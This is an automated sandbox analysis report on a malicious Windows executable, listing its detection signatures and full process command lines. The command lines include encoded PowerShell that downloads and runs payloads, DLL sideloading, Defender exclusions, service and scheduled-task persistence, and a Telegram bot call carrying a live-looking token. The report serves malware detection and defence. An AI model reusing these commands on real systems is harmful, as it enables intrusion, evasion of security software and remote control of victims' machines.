Edit tour
Windows
Analysis Report
app64.exe
Overview
General Information
| Sample name: | app64.exe |
| Analysis ID: | 1545289 |
| MD5: | 40b887735996fc88f47650c322273a25 |
| SHA1: | e2f583114fcd22b2083ec78f42cc185fb89dd1ff |
| SHA256: | d762fccbc10d8a1c8c1c62e50bce8a4289c212b5bb4f1fe50f6fd7dd3772b14a |
| Tags: | exeuser-NDA0E |
| Infos: |   |
 | |
Detection
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: TrustedPath UAC Bypass Pattern
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Creates a Windows Service pointing to an executable in C:\Windows
Drops PE files to the user root directory
Drops executables to the windows directory (C:\Windows) and starts them
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Powershell drops PE file
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious New Service Creation
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious command line found
Suspicious powershell command line found
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create an SMB header
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Uses the system / local time for branch decision (may execute only at specific dates)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
app64.exe (PID: 2696 cmdline: "C:\Users\ user\Deskt op\app64.e xe" MD5: 40B887735996FC88F47650C322273A25)
cmd.exe (PID: 5956 cmdline: cmd.exe /c powershel l -Command "$decoded = [System .Text.Enco ding]::UTF 8.GetStrin g([System. Convert]:: FromBase64 String('JG NvdW50ZXIg PSAwOw0KJH B5bFBhdGgg PSAiQzpcVX NlcnNcUHVi bGljXHB5bG QuZGxsIjsN CmZvciAoOz spew0KCWlm ICgkY291bn RlciAtbGUg Myl7DQoJCS hOZXctT2Jq ZWN0IFN5c3 RlbS5OZXQu V2ViQ2xpZW 50KS5Eb3du bG9hZEZpbG UoImh0dHBz Oi8vZ2l0aH ViLmNvbS91 bnZkMDEvdW 52bWFpbi9y YXcvbWFpbi 91bjIvYm90 cHJudC5kYX QiLCAkcHls UGF0aCk7DQ oJfQ0KCWVs c2V7DQoJCS hOZXctT2Jq ZWN0IFN5c3 RlbS5OZXQu V2ViQ2xpZW 50KS5Eb3du bG9hZEZpbG UoImh0dHA6 Ly91bnZkd2 wuY29tL3Vu Mi9ib3Rwcm 50LmRhdCIs ICRweWxQYX RoKTsNCgl9 DQoJU3Rhcn QtU2xlZXAg LVNlY29uZH MgMjsNCglp ZiAoVGVzdC 1QYXRoICRw eWxQYXRoKX sNCgkJY21k IC9jIG1rZG lyICJcXD9c QzpcV2luZG 93cyBcU3lz dGVtMzIiOw 0KCQljbWQg L2MgeGNvcH kgL3kgIkM6 XFdpbmRvd3 NcU3lzdGVt MzJccHJpbn R1aS5leGUi ICJDOlxXaW 5kb3dzIFxT eXN0ZW0zMi I7DQoJCWNt ZCAvYyBtb3 ZlIC95ICJD OlxVc2Vyc1 xQdWJsaWNc cHlsZC5kbG wiICJDOlxX aW5kb3dzIF xTeXN0ZW0z MlxwcmludH VpLmRsbCI7 DQoJCVN0YX J0LVNsZWVw IC1TZWNvbm RzIDI7DQoJ CVN0YXJ0LV Byb2Nlc3Mg LUZpbGVQYX RoICJDOlxX aW5kb3dzIF xTeXN0ZW0z MlxwcmludH VpLmV4ZSI7 DQoJCWJyZW FrOw0KCX0N CgllbHNlew 0KCQlbTmV0 LlNlcnZpY2 VQb2ludE1h bmFnZXJdOj pTZWN1cml0 eVByb3RvY2 9sID0gW05l dC5TZWN1cm l0eVByb3Rv Y29sVHlwZV 06OlRsczEy Ow0KCQlTdG FydC1TbGVl cCAtU2Vjb2 5kcyAyMDsJ DQoJfQ0KCW lmICgkY291 bnRlciAtZX EgMTApew0K CQlicmVhaz sNCgl9DQoJ JGNvdW50ZX IrKzsNCn0= ')); Invok e-Expressi on $decode d;" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 5952 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
powershell.exe (PID: 2124 cmdline: powershell -Command "$decoded = [System. Text.Encod ing]::UTF8 .GetString ([System.C onvert]::F romBase64S tring('JGN vdW50ZXIgP SAwOw0KJHB 5bFBhdGggP SAiQzpcVXN lcnNcUHVib GljXHB5bGQ uZGxsIjsNC mZvciAoOzs pew0KCWlmI CgkY291bnR lciAtbGUgM yl7DQoJCSh OZXctT2JqZ WN0IFN5c3R lbS5OZXQuV 2ViQ2xpZW5 0KS5Eb3dub G9hZEZpbGU oImh0dHBzO i8vZ2l0aHV iLmNvbS91b nZkMDEvdW5 2bWFpbi9yY XcvbWFpbi9 1bjIvYm90c HJudC5kYXQ iLCAkcHlsU GF0aCk7DQo JfQ0KCWVsc 2V7DQoJCSh OZXctT2JqZ WN0IFN5c3R lbS5OZXQuV 2ViQ2xpZW5 0KS5Eb3dub G9hZEZpbGU oImh0dHA6L y91bnZkd2w uY29tL3VuM i9ib3Rwcm5 0LmRhdCIsI CRweWxQYXR oKTsNCgl9D QoJU3RhcnQ tU2xlZXAgL VNlY29uZHM gMjsNCglpZ iAoVGVzdC1 QYXRoICRwe WxQYXRoKXs NCgkJY21kI C9jIG1rZGl yICJcXD9cQ zpcV2luZG9 3cyBcU3lzd GVtMzIiOw0 KCQljbWQgL 2MgeGNvcHk gL3kgIkM6X FdpbmRvd3N cU3lzdGVtM zJccHJpbnR 1aS5leGUiI CJDOlxXaW5 kb3dzIFxTe XN0ZW0zMiI 7DQoJCWNtZ CAvYyBtb3Z lIC95ICJDO lxVc2Vyc1x QdWJsaWNcc HlsZC5kbGw iICJDOlxXa W5kb3dzIFx TeXN0ZW0zM lxwcmludHV pLmRsbCI7D QoJCVN0YXJ 0LVNsZWVwI C1TZWNvbmR zIDI7DQoJC VN0YXJ0LVB yb2Nlc3MgL UZpbGVQYXR oICJDOlxXa W5kb3dzIFx TeXN0ZW0zM lxwcmludHV pLmV4ZSI7D QoJCWJyZWF rOw0KCX0NC gllbHNlew0 KCQlbTmV0L lNlcnZpY2V Qb2ludE1hb mFnZXJdOjp TZWN1cml0e VByb3RvY29 sID0gW05ld C5TZWN1cml 0eVByb3RvY 29sVHlwZV0 6OlRsczEyO w0KCQlTdGF ydC1TbGVlc CAtU2Vjb25 kcyAyMDsJD QoJfQ0KCWl mICgkY291b nRlciAtZXE gMTApew0KC QlicmVhazs NCgl9DQoJJ GNvdW50ZXI rKzsNCn0=' )); Invoke -Expressio n $decoded ;" MD5: 04029E121A0CFA5991749937DD22A1D9) - cmd.exe (PID: 764 cmdline:
"C:\Window s\system32 \cmd.exe" /c mkdir " \\?\C:\Win dows \Syst em32" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 5780 cmdline:
"C:\Window s\system32 \cmd.exe" /c xcopy / y C:\Windo ws\System3 2\printui. exe "C:\Wi ndows \Sys tem32" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - xcopy.exe (PID: 5488 cmdline:
xcopy /y C :\Windows\ System32\p rintui.exe "C:\Windo ws \System 32" MD5: 39FBFD3AF58238C6F9D4D408C9251FF5) - cmd.exe (PID: 5784 cmdline:
"C:\Window s\system32 \cmd.exe" /c move /y C:\Users\ Public\pyl d.dll "C:\ Windows \S ystem32\pr intui.dll" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) 
printui.exe (PID: 6656 cmdline: "C:\Window s \System3 2\printui. exe" MD5: 2FC3530F3E05667F8240FC77F7486E7E) - printui.exe (PID: 3752 cmdline:
"C:\Window s \System3 2\printui. exe" MD5: 2FC3530F3E05667F8240FC77F7486E7E) - cmd.exe (PID: 7156 cmdline:
cmd.exe /c powershel l -Command "$decoded = [System .Text.Enco ding]::UTF 8.GetStrin g([System. Convert]:: FromBase64 String('QW RkLU1wUHJl ZmVyZW5jZS AtRXhjbHVz aW9uUGF0aC AiJGVudjpT eXN0ZW1Ecm l2ZVxXaW5k b3dzIFxTeX N0ZW0zMiI7 DQpBZGQtTX BQcmVmZXJl bmNlIC1FeG NsdXNpb25Q YXRoICIkZW 52OlN5c3Rl bURyaXZlXF dpbmRvd3Nc U3lzdGVtMz IiOw==')); Invoke-Ex pression $ decoded;" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 4592 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 6620 cmdline:
powershell -Command "$decoded = [System. Text.Encod ing]::UTF8 .GetString ([System.C onvert]::F romBase64S tring('QWR kLU1wUHJlZ mVyZW5jZSA tRXhjbHVza W9uUGF0aCA iJGVudjpTe XN0ZW1Ecml 2ZVxXaW5kb 3dzIFxTeXN 0ZW0zMiI7D QpBZGQtTXB QcmVmZXJlb mNlIC1FeGN sdXNpb25QY XRoICIkZW5 2OlN5c3Rlb URyaXZlXFd pbmRvd3NcU 3lzdGVtMzI iOw==')); Invoke-Exp ression $d ecoded;" MD5: 04029E121A0CFA5991749937DD22A1D9) - cmd.exe (PID: 6436 cmdline:
cmd.exe /c powershel l -Command "Add-MpPr eference - ExclusionP ath '%Syst emDrive%\W indows \Sy stem32'; A dd-MpPrefe rence -Exc lusionPath '%SystemD rive%\Wind ows\System 32';" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 368 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 1400 cmdline:
powershell -Command "Add-MpPre ference -E xclusionPa th 'C:\Win dows \Syst em32'; Add -MpPrefere nce -Exclu sionPath ' C:\Windows \System32' ;" MD5: 04029E121A0CFA5991749937DD22A1D9) - cmd.exe (PID: 7132 cmdline:
cmd.exe /c sc create x590769 b inPath= "C :\Windows\ System32\s vchost.exe -k DcomLa unch" type = own star t= auto && reg add H KLM\SYSTEM \CurrentCo ntrolSet\s ervices\x5 90769\Para meters /v ServiceDll /t REG_EX PAND_SZ /d "C:\Windo ws\System3 2\x590769. dat" /f && sc start x590769 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 2460 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - sc.exe (PID: 5548 cmdline:
sc create x590769 bi nPath= "C: \Windows\S ystem32\sv chost.exe -k DcomLau nch" type= own start = auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80) - reg.exe (PID: 7120 cmdline:
reg add HK LM\SYSTEM\ CurrentCon trolSet\se rvices\x59 0769\Param eters /v S erviceDll /t REG_EXP AND_SZ /d "C:\Window s\System32 \x590769.d at" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4) - sc.exe (PID: 2556 cmdline:
sc start x 590769 MD5: 3FB5CF71F7E7EB49790CB0E663434D80) - cmd.exe (PID: 1632 cmdline:
cmd.exe /c start "" "C:\Window s\System32 \console_z ero.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 3424 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - console_zero.exe (PID: 2944 cmdline:
"C:\Window s\System32 \console_z ero.exe" MD5: 49672519E74E8AD135DAE7345BCEFF41) - cmd.exe (PID: 4612 cmdline:
cmd.exe /c schtasks /create /t n "console _zero" /sc ONLOGON / tr "C:\Win dows\Syste m32\consol e_zero.exe " /rl HIGH EST /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 1412 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - schtasks.exe (PID: 5580 cmdline:
schtasks / create /tn "console_ zero" /sc ONLOGON /t r "C:\Wind ows\System 32\console _zero.exe" /rl HIGHE ST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2) - cmd.exe (PID: 6568 cmdline:
cmd.exe /c powershel l -Command "Invoke-R estMethod -Uri 'http s://api.te legram.org /bot798559 3430:AAEF1 nr-tPqIt5E PQKoPG8e70 1BArtUIAv0 /sendMessa ge' -Metho d Post -Co ntentType 'applicati on/json' - Body (Conv ertTo-Json @{chat_id ='15361314 59'; text= '[loader] user@12371 6: Install ed success .'});" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 1996 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 5656 cmdline:
powershell -Command "Invoke-Re stMethod - Uri 'https ://api.tel egram.org/ bot7985593 430:AAEF1n r-tPqIt5EP QKoPG8e701 BArtUIAv0/ sendMessag e' -Method Post -Con tentType ' applicatio n/json' -B ody (Conve rtTo-Json @{chat_id= '153613145 9'; text=' [loader] u ser@123716 : Installe d success. '});" MD5: 04029E121A0CFA5991749937DD22A1D9) - cmd.exe (PID: 4744 cmdline:
cmd.exe /c timeout / t 14 /nobr eak && rmd ir /s /q " C:\Windows \" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 3848 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - timeout.exe (PID: 6428 cmdline:
timeout /t 14 /nobre ak MD5: 100065E21CFBBDE57CBA2838921F84D6) - cmd.exe (PID: 2696 cmdline:
cmd.exe /c timeout / t 16 /nobr eak && del /q "C:\Wi ndows\Syst em32\usvcl dr64.dat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 5956 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - timeout.exe (PID: 6580 cmdline:
timeout /t 16 /nobre ak MD5: 100065E21CFBBDE57CBA2838921F84D6)
- svchost.exe (PID: 5276 cmdline:
C:\Windows \System32\ svchost.ex e -k Local Service -p -s Licens eManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- svchost.exe (PID: 4672 cmdline:
C:\Windows \System32\ svchost.ex e -k DcomL aunch MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - cmd.exe (PID: 432 cmdline:
cmd.exe /c powershel l -Command Add-MpPre ference -E xclusionPa th 'c:\win dows\syste m32' MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 4748 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 3184 cmdline:
powershell -Command Add-MpPref erence -Ex clusionPat h 'c:\wind ows\system 32' MD5: 04029E121A0CFA5991749937DD22A1D9) - cmd.exe (PID: 5864 cmdline:
cmd.exe /c powershel l -Command Add-MpPre ference -E xclusionPa th 'C:\Win dows \Syst em32' MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 6204 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 2820 cmdline:
powershell -Command Add-MpPref erence -Ex clusionPat h 'C:\Wind ows \Syste m32' MD5: 04029E121A0CFA5991749937DD22A1D9) - cmd.exe (PID: 4332 cmdline:
cmd.exe /c powershel l -Command Add-MpPre ference -E xclusionPa th 'E:\' MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 1888 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 3092 cmdline:
powershell -Command Add-MpPref erence -Ex clusionPat h 'E:\' MD5: 04029E121A0CFA5991749937DD22A1D9) - cmd.exe (PID: 4480 cmdline:
cmd.exe /c powershel l -Command Add-MpPre ference -E xclusionPa th 'F:\' MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 6716 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 3936 cmdline:
powershell -Command Add-MpPref erence -Ex clusionPat h 'F:\' MD5: 04029E121A0CFA5991749937DD22A1D9)
- console_zero.exe (PID: 6284 cmdline:
C:\Windows \System32\ console_ze ro.exe MD5: 49672519E74E8AD135DAE7345BCEFF41) - cmd.exe (PID: 5860 cmdline:
cmd.exe /c schtasks /create /t n "console _zero" /sc ONLOGON / tr "C:\Win dows\Syste m32\consol e_zero.exe " /rl HIGH EST /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 6308 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - schtasks.exe (PID: 6100 cmdline:
schtasks / create /tn "console_ zero" /sc ONLOGON /t r "C:\Wind ows\System 32\console _zero.exe" /rl HIGHE ST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
- cleanup
⊘No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
| INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
| |
| INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
|
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
| JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security | ||
| JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security |
System Summary |   |
|---|
| Source: | Author: Florian Roth (Nextron Systems): | ||
| Source: | Author: Florian Roth (Nextron Systems): | ||